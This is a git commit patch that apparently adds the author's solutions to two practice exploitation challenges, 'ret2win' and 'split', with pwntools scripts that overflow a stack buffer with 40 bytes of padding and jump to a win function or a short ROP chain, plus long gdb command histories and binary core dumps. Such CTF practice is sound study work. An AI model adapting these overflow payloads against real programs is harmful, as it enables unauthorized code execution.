From ae586f332c3fa2919fca99b0ff8acf1e339b0061 Mon Sep 17 00:00:00 2001 From: Brett Weiland Date: Mon, 14 Dec 2020 18:27:06 -0600 Subject: new file: x86_64/ret2win/.gdb_history new file: x86_64/ret2win/core new file: x86_64/ret2win/exploit.py new file: x86_64/split/.gdb_history new file: x86_64/split/core new file: x86_64/split/core.split.25050 new file: x86_64/split/exploit.py new file: x86_64/split/fuckyou new file: x86_64/split/xaa --- x86_64/ret2win/.gdb_history | 6 + x86_64/ret2win/core | Bin 0 -> 2183168 bytes x86_64/ret2win/exploit.py | 13 +++ x86_64/split/.gdb_history | 256 ++++++++++++++++++++++++++++++++++++++++++ x86_64/split/core | Bin 0 -> 2183168 bytes x86_64/split/core.split.25050 | Bin 0 -> 7067872 bytes x86_64/split/exploit.py | 17 +++ x86_64/split/fuckyou | Bin 0 -> 64 bytes x86_64/split/xaa | Bin 0 -> 50 bytes 9 files changed, 292 insertions(+) create mode 100644 x86_64/ret2win/.gdb_history create mode 100644 x86_64/ret2win/core create mode 100755 x86_64/ret2win/exploit.py create mode 100644 x86_64/split/.gdb_history create mode 100644 x86_64/split/core create mode 100644 x86_64/split/core.split.25050 create mode 100755 x86_64/split/exploit.py create mode 100644 x86_64/split/fuckyou create mode 100644 x86_64/split/xaa diff --git a/x86_64/ret2win/.gdb_history b/x86_64/ret2win/.gdb_history new file mode 100644 index 0000000..54449f7 --- /dev/null +++ b/x86_64/ret2win/.gdb_history @@ -0,0 +1,6 @@ +starti +context +nexti +break main +continue +q diff --git a/x86_64/ret2win/core b/x86_64/ret2win/core new file mode 100644 index 0000000..4a61a20 Binary files /dev/null and b/x86_64/ret2win/core differ diff --git a/x86_64/ret2win/exploit.py b/x86_64/ret2win/exploit.py new file mode 100755 index 0000000..d5506b2 --- /dev/null +++ b/x86_64/ret2win/exploit.py @@ -0,0 +1,13 @@ +#!/usr/bin/env python3 +from pwn import * + +prog = process('./ret2win') +payload = b'' +for c in range(40): + payload += b'a' + +payload += p64(0x0000000000400756) +payload += b"\n" +prog.sendline(payload) +sleep(1) +print(str(prog.recv(), 'UTF-8')) diff --git a/x86_64/split/.gdb_history b/x86_64/split/.gdb_history new file mode 100644 index 0000000..7bd75aa --- /dev/null +++ b/x86_64/split/.gdb_history @@ -0,0 +1,256 @@ +print (char)usefulString +print (char&)usefulString +print (char*)usefulString +print (char)*usefulString +print (charusefulString +print (char)usefulString +print (char*)usefulString +print (char)*usefulString +quit +exit +quit +nexti +exit +quit +exit +quit +quit +exit +quit +context +next +continue +context +quit +nexti +continu +context +q +context +run +break main +continue +context +nexti +backtrace +set exception-debugger on +continue +quit +stepi +ret +return +stepi +break +delete +run +continue +clear +delete +continue +clear +delete +continue +delete 0x7f992453fece +delete 0 +delete 1 +delete 2 +delete 3 +quit +continue +context +q +context +q +quit +continue +context +continue +q +q +break main +continue +context +nexti +stepi +quit +break main +run +conitnue +continue +context +stepi +nexti +stepi +return +stepi +return +stepi +ret +return +stepi +return +stepi +stepi +info breakpoints +stepi +return +stepi +nexti +break 0x400706 +break *0x400706 +quit +continue +context +q +continue +context +continue +quit +continue +continue +quit +continue +context +quit +continue +quit +exit +quit +nexti +continue +quit +continue +quit +break pwnme +nexti +continue +bexti +nexti +quit +quit +continue +quit +continue +nexti +quit +continue +q +continue +quit +continue +[ +quit +start < fuckyou +continue +q +break *0x0x000000000040074b +break *0x000000000040074b +run < fuckyou +context +x/s 0x7fffffffdb20 +x/s 0x7fffffffdb20 - 20 +x/s 0x7fffffffdb2 +quit +break *0x000000000040074b +run < fuckyou +context +x/s 0x7fffffffdb20 +x/s 0x7fffffffdb20 - 8 +x/s 0x7fffffffdb20 +x/s 0x7fffffffdb20 - 8 +x/s 0x7fffffffdb20 + 8 +quit +quit +run < fuckyou +quit +break *0x000000000040074b +run < fuckyou +context +stepi +q +break *0x000000000040074b +run < fuckyou +context +q +break *0x000000000040074b +run < fuckyou +context +x 0x7fffffffdb20-8 +x 0x7ffff7fad800 +q +break pwnme +run < fuckyou +nexti +q +break pwnme +run +q +break pwnme +run < fuckyou +context +nexti +q +break pwnme +run < fuckyou +nexti +x/100c 0x7ffff7fad800 +context +nexti +quit +break *0x00000000004007c3 +run < fuckyou +context +nexti +stepi +q +break pwnme +start < fuckyou +context +stepi +return +context +break pwnme +continue +q +break pwnme +run < fuckyou +context +nexti +stepi +q +continue +quit +continue +[A +quit +q +info break +nexti +break main +continue +nexti +return +nexti +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +q +continue +nexti +q +continue +nexti +continue +quit diff --git a/x86_64/split/core b/x86_64/split/core new file mode 100644 index 0000000..cf4e312 Binary files /dev/null and b/x86_64/split/core differ diff --git a/x86_64/split/core.split.25050 b/x86_64/split/core.split.25050 new file mode 100644 index 0000000..6acafe1 Binary files /dev/null and b/x86_64/split/core.split.25050 differ diff --git a/x86_64/split/exploit.py b/x86_64/split/exploit.py new file mode 100755 index 0000000..0340b77 --- /dev/null +++ b/x86_64/split/exploit.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python3 +from pwn import * + + +context.binary = "./split" +prog = process('./split') +payload = b'' + +for c in range(40): #originally 40 + payload += b'a' + +payload += p64(0x00000000004007c3) +payload += p64(0x0000000000601060) # usefulString +payload += p64(0x000000000040074b) # usefulFunction + offset + +prog.sendline(payload) +prog.interactive() diff --git a/x86_64/split/fuckyou b/x86_64/split/fuckyou new file mode 100644 index 0000000..d25275b Binary files /dev/null and b/x86_64/split/fuckyou differ diff --git a/x86_64/split/xaa b/x86_64/split/xaa new file mode 100644 index 0000000..f1294fd Binary files /dev/null and b/x86_64/split/xaa differ -- cgit v1.2.3